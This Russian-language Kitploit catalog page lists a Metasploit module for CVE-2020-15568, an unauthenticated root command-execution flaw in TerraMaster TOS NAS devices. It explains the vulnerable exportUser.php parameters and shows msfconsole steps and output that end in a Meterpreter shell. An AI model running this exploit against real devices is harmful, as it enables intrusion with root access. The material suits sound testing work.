Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
TerraMaster-TOS-CVE-2020-15568 — Репозиторий для модуля Metasploit CVE-2020-15568 | Kitploit
Инструменты/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

Репозиторий для модуля Metasploit CVE-2020-15568

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
33 лет назадЕщё не проверено

TerraMaster TOS CVE-2020-15568

Репозиторий для модуля Metasploit CVE-2020-15568

Уязвимое приложение

Описание

Уязвимость динамического вызова метода класса существует в файле include/exportUser.php, что приводит к выполнению удалённых команд на устройствах TerraMaster с правами root. Уязвимый файл требует указания нескольких HTTP GET-параметров, чтобы можно было добраться до вызова метода и использовать эту уязвимость. В первой строке приложение подключает app.php, который автоматически загружает соответствующие основные классы программного обеспечения TOS. Приложение выбирает операцию на основе значения параметра type из GET-запроса. Если значение переменной type отличается от 1 или 2, то можно добраться до уязвимого кода. В исходном коде exportUser.php приложение требует HTTP GET-параметры cla (сокращение от class), func и opt.

Во время анализа кода других файлов также было обнаружено, что эту проблему можно эксплуатировать с помощью уже существующих классов в программном обеспечении TOS. PHP-класс, расположенный в include/class/application.class.php, является лучшим кандидатом для выполнения команд на устройствах, работающих под управлением ПО TOS. Поскольку exportUser.php не имеет средств аутентификации, неаутентифицированный злоумышленник может добраться до выполнения кода.

Шаги проверки

  1. Настройте ваш TerraMaster NAS с версией TOS 4.1.24 или ниже
  2. Запустите msfconsole
  3. Выполните: use exploit/multi/http/terramaster_command_exec
  4. Выполните set rhost 192.168.1.27
  5. Выполните: check
root@kitploit:~
[+] 192.168.1.27:80 - The target is vulnerable.

Цели

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

Сценарии

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter > 
Скачать инструмент